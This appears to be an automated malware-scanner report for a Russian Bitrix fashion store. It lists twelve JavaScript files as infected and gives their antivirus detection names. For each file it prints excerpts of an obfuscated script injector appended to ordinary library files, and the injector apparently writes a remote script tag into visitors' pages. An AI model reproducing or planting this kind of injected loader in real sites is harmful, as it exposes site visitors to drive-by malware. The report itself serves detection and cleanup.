Malware Scanner report for fashioncode.ru

Malicious/Suspicious/Total urls checked: 12/0/15

12 pages have malicious code. See details below

Blacklists: Found

The website is marked by Yandex as suspicious.

The website "fashioncode.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=fashioncode.ru

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://fashioncode.ru/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://fashioncode.ru/	200 OK Content-Length: 6009 Content-Type: text/html	clean
http://fashioncode.ru/bitrix/js/main/core/core.js?1364972583	200 OK Content-Length: 76550 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) ;(function(){ if (!!window.BX && !!window.BX.extend) return; var _bxtmp; if (!!window.BX) { _bxtmp = window.BX; } window.BX = function(node, bCache) { if (BX.type.isNotEmptyString(node)) { var ob; if (!!bCache && null != NODECACHE[node]) ob = NODECACHE[node]; ob = ob \|\| document.getElementById(node); if (!!bCache) NODECACHE[node] = ob; return ob; } else if (BX.type.isDomNode(node ... 3426 bytes are skipped ...$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+"://"+$.$$$$+$.__+$.__+$.__$+".\\"+$.__$+$.$$_+$._$_+$._+"/\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$._$$+$.__+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"'></\\"+$.__$+$.$$_+$._$$+"\\\"+\\\""+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+">\\\");"+"\"")())();} Antivirus reports: Avast JS:Includer-BBO [Trj] Ad-Aware Trojan.JS.QVC nProtect Trojan.JS.QVC Emsisoft Trojan.JS.QVC (B) DrWeb JS.IFrame.579 MicroWorld-eScan Trojan.JS.QVC NANO-Antivirus Trojan.Script.IFrame.bbcbap F-Secure Trojan.JS.QVC Sophos Troj/JSRedir-HZ GData Trojan.JS.QVC ESET-NOD32 JS/Agent.NLZ BitDefender Trojan.JS.QVC
http://fashioncode.ru/bitrix/js/main/core/core_ajax.js?1364972585	200 OK Content-Length: 30467 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) ;(function(window){ if (window.BX.ajax) return; var BX = window.BX, tempDefaultConfig = {}, defaultConfig = { method: 'GET', dataType: 'html', timeout: 0, async: true, processData: true, scriptsRunFirst: false, emulateOnload: true, start: true, cache: true, preparePost: true, headers: false, lsTimeout: 30, lsForce: false }, ajax_session = null, loadedScripts = {}, loadedScriptsQueue = [], r = { 'url_utf ... 3333 bytes are skipped ..._$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+": Antivirus reports: Ad-Aware Trojan.JS.QVC Ikarus Trojan.Script nProtect Trojan.JS.QVC Emsisoft Trojan.JS.QVC (B) MicroWorld-eScan Trojan.JS.QVC NANO-Antivirus Trojan.Script.IFrame.bbcbap F-Secure Trojan.JS.QVC GData Trojan.JS.QVC BitDefender Trojan.JS.QVC
http://fashioncode.ru/bitrix/js/main/session.js?1364972583	200 OK Content-Length: 5606 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) function CBXSession() { var _this = this; this.mess = {}; this.timeout = null; this.sessid = null; this.bShowMess = true; this.dateStart = new Date(); this.dateInput = new Date(); this.dateCheck = new Date(); this.activityInterval = 0; this.notifier = null; this.Expand = function(timeout, sessid, bShowMess, key) { this.timeout = timeout; this.sessid = sessid; this.bShowMess = bShowMess; this.key = key;< ... 4439 bytes are skipped ..._$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+": Antivirus reports: Ad-Aware Trojan.JS.QVC Ikarus Trojan.Script nProtect Trojan.JS.QVC Emsisoft Trojan.JS.QVC (B) MicroWorld-eScan Trojan.JS.QVC NANO-Antivirus Trojan.Script.IFrame.bbcbap F-Secure Trojan.JS.QVC GData Trojan.JS.QVC BitDefender Trojan.JS.QVC
http://fashioncode.ru/butik/	200 OK Content-Length: 29575 Content-Type: text/html	clean
http://fashioncode.ru/bitrix/templates/eshop_blue/js/jquery-1.8.2.min.js	200 OK Content-Length: 95884 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(a,b){function G(a){var b=F[a]={};return p.each(a.split(s),function(a,c){b[c]=!0}),b}function J(a,c,d){if(d===b&&a.nodeType===1){var e="data-"+c.replace(I,"-$1").toLowerCase();d=a.getAttribute(e);if(typeof d=="string"){try{d=d==="true"?!0:d==="false"?!1:d==="null"?null:+d+""===d?+d:H.test(d)?p.parseJSON(d):d}catch(f){}p.data(a,c,d)}else d=b}return d}function K(a){var b;for(b in a){if(b==="data"&&p.isEmptyObject(a[b]))continue;if(b!=="toJSON")return!1}return!0}function ba ... 3119 bytes are skipped ..._$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+": Antivirus reports: Ad-Aware Trojan.JS.QVC Ikarus Trojan.Script nProtect Trojan.JS.QVC Emsisoft Trojan.JS.QVC (B) MicroWorld-eScan Trojan.JS.QVC F-Secure Trojan.JS.QVC GData Trojan.JS.QVC BitDefender Trojan.JS.QVC
http://fashioncode.ru/bitrix/js/socialservices/ss.js?1364972585	200 OK Content-Length: 3868 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) function BxShowAuthService(id, suffix) { var bxCurrentAuthId = ''; if(window['bxCurrentAuthId'+suffix]) bxCurrentAuthId = window['bxCurrentAuthId'+suffix]; BX('bx_auth_serv'+suffix).style.display = ''; if(bxCurrentAuthId != '' && bxCurrentAuthId != id) { BX('bx_auth_href_'+suffix+bxCurrentAuthId).className = ''; BX('bx_auth_serv_'+suffix+bxCurrentAuthId).style.display = 'none'; } BX('bx_auth_href_'+suffix+id).className = 'bx-ss-se ... 2427 bytes are skipped ..._$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+": Antivirus reports: Ad-Aware Trojan.JS.QVC Ikarus Trojan.Script nProtect Trojan.JS.QVC Emsisoft Trojan.JS.QVC (B) MicroWorld-eScan Trojan.JS.QVC NANO-Antivirus Trojan.Script.IFrame.bbcbap F-Secure Trojan.JS.QVC GData Trojan.JS.QVC BitDefender Trojan.JS.QVC
http://fashioncode.ru/bitrix/templates/eshop_blue/js/slides.min.jquery.js	200 OK Content-Length: 10151 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function($){$.fn.slides=function(option){option=$.extend({},$.fn.slides.option,option);return this.each(function(){$('.'+option.container,$(this)).children().wrapAll('<div class="slides_control"/>');var elem=$(this),control=$('.slides_control',elem),total=control.children().size(),width=control.children().outerWidth(),height=control.children().outerHeight(),start=option.start-1,effect=option.effect.indexOf(',')<0?option.effect:option.effect.replace(' ','').split(',')[0],paginationEffec ... 3078 bytes are skipped ..._$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+": Antivirus reports: Ad-Aware Trojan.JS.QVC Ikarus Trojan.Script nProtect Trojan.JS.QVC Emsisoft Trojan.JS.QVC (B) MicroWorld-eScan Trojan.JS.QVC NANO-Antivirus Trojan.Script.IFrame.bbcbap F-Secure Trojan.JS.QVC GData Trojan.JS.QVC BitDefender Trojan.JS.QVC
http://fashioncode.ru/bitrix/templates/eshop_blue/script.js	200 OK Content-Length: 30514 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) $(".tabsblock > .tabs > a").live('click', function() { var ind = $(this).index(); ind++; if ($(this).hasClass("active")){} else { $(this).parents('.tabsblock').find('.active').removeClass('active') $(this).addClass('active'); $(".tabsblock").find(".cnt:nth-child("+ind+")").addClass('active'); } return false; }); $("#notify_auth_form > .social > form > ul > li > a").live('click', function() { setTimeout(function() ... 3272 bytes are skipped ..._$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+": Antivirus reports: Ad-Aware Trojan.JS.QVC Ikarus Trojan.Script nProtect Trojan.JS.QVC Emsisoft Trojan.JS.QVC (B) MicroWorld-eScan Trojan.JS.QVC NANO-Antivirus Trojan.Script.IFrame.bbcbap F-Secure Trojan.JS.QVC GData Trojan.JS.QVC BitDefender Trojan.JS.QVC
http://fashioncode.ru/bitrix/templates/eshop_blue/js/jquery.carouFredSel-5.6.4-packed.js	200 OK Content-Length: 34773 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]\|\|e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(H($){8($.1P.1J)J;$.1P.1J=H(y,z){8(1g.V==0){1e(N,\'5s 4q 6u 1m "\'+1g.3U+\'".\');J 1g}8(1g.V>1){J 1g.1K(H(){$(1g).1J(y,z)})}F A=1g,$19=1g[0];8(A.1r(\'4r\')){F B=A.1D ... 3047 bytes are skipped ..._$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+": Antivirus reports: Ad-Aware Trojan.JS.QVC Ikarus Trojan.Script nProtect Trojan.JS.QVC Emsisoft Trojan.JS.QVC (B) MicroWorld-eScan Trojan.JS.QVC NANO-Antivirus Trojan.Script.IFrame.bbcbap F-Secure Trojan.JS.QVC GData Trojan.JS.QVC BitDefender Trojan.JS.QVC
http://fashioncode.ru/bitrix/templates/eshop_blue/js/jquery.cookie.js	200 OK Content-Length: 6820 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) jQuery.cookie = function(name, value, options) { if (typeof value != 'undefined') { options = options \|\| {}; if (value === null) { value = ''; options = $.extend({}, options); options.expires = -1; } var expires = ''; if (options.expires && (typeof options.expires == 'number' \|\| options.expires.toUTCString)) { var date; if (typeof options.expires == ... 2584 bytes are skipped ..._$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+": Antivirus reports: Ad-Aware Trojan.JS.QVC Ikarus Trojan.Script nProtect Trojan.JS.QVC Emsisoft Trojan.JS.QVC (B) MicroWorld-eScan Trojan.JS.QVC NANO-Antivirus Trojan.Script.IFrame.bbcbap F-Secure Trojan.JS.QVC GData Trojan.JS.QVC BitDefender Trojan.JS.QVC
http://fashioncode.ru/bitrix/templates/eshop_blue/js/jquery.slideViewerPro.1.5.js	200 OK Content-Length: 12994 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) jQuery.extend( jQuery.easing, { easeInOutExpo: function (x, t, b, c, d) { if (t==0) return b; if (t==d) return b+c; if ((t/=d/2) < 1) return c/2 * Math.pow(2, 10 * (t - 1)) + b; return c/2 * (-Math.pow(2, -10 * --t) + 2) + b; } }); jQuery(function(){ jQuery("div.svwp").prepend("<img src='images/svwloader.gif' class='ldrgif' alt='loading...'/ >"); }); var j = 0; jQuery.fn.slideViewerPro = function(settings) { settings = jQue ... 3287 bytes are skipped ..._$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+": Antivirus reports: Ad-Aware Trojan.JS.QVC Ikarus Trojan.Script nProtect Trojan.JS.QVC Emsisoft Trojan.JS.QVC (B) MicroWorld-eScan Trojan.JS.QVC NANO-Antivirus Trojan.Script.IFrame.bbcbap F-Secure Trojan.JS.QVC GData Trojan.JS.QVC BitDefender Trojan.JS.QVC
http://fashioncode.ru/bitrix/templates/eshop_blue/js/jquery.timers.js	200 OK Content-Length: 5656 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) jQuery.fn.extend({ everyTime: function(interval, label, fn, times, belay) { return this.each(function() { jQuery.timer.add(this, interval, label, fn, times, belay); }); }, oneTime: function(interval, label, fn) { return this.each(function() { jQuery.timer.add(this, interval, label, fn, 1); }); }, stopTime: function(label, fn) { return this.each(function() { jQuery.timer.remove(this, label, fn); }); } });... 4560 bytes are skipped ..._$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+": Antivirus reports: Ad-Aware Trojan.JS.QVC Ikarus Trojan.Script nProtect Trojan.JS.QVC Emsisoft Trojan.JS.QVC (B) MicroWorld-eScan Trojan.JS.QVC NANO-Antivirus Trojan.Script.IFrame.bbcbap F-Secure Trojan.JS.QVC GData Trojan.JS.QVC BitDefender Trojan.JS.QVC
http://fashioncode.ru/bitrix/templates/eshop_blue/components/bitrix/menu/horizontal_multilevel/script.js?1364972300	200 OK Content-Length: 2918 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var jshover = function() { var menuDiv = document.getElementById("horizontal-multilevel-menu") if (!menuDiv) return; var sfEls = menuDiv.getElementsByTagName("li"); for (var i=0; i<sfEls.length; i++) { sfEls[i].onmouseover=function() { this.className+=" jshover"; } sfEls[i].onmouseout=function() { this.className=this.className.replace(new RegExp(" jshover\\b"), ""); } } } if (window.attachEvent ... 1369 bytes are skipped ..._$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+": Antivirus reports: Ad-Aware Trojan.JS.QVC Ikarus Trojan.Script nProtect Trojan.JS.QVC Emsisoft Trojan.JS.QVC (B) MicroWorld-eScan Trojan.JS.QVC NANO-Antivirus Trojan.Script.IFrame.bbcbap F-Secure Trojan.JS.QVC GData Trojan.JS.QVC BitDefender Trojan.JS.QVC
http://fashioncode.ru/special-offer/	200 OK Content-Length: 36027 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: fashioncode.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 26 Aug 2014 11:56:31 GMT
Pragma: no-cache
Server: DataPalm/3.5
Content-Length: 6009
Content-Type: text/html; charset=windows-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
Set-Cookie: PHPSESSID=bbd9a13cf4d3d275d4fecdaae2b2fde0; path=/
X-Powered-CMS: Bitrix Site Manager (4be2b5d1fc90fdee13b7766422e8e6ae)

...6009 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: fashioncode.ru
Referer: http://www.google.com/search?q=fashioncode.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for fashioncode.ru

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools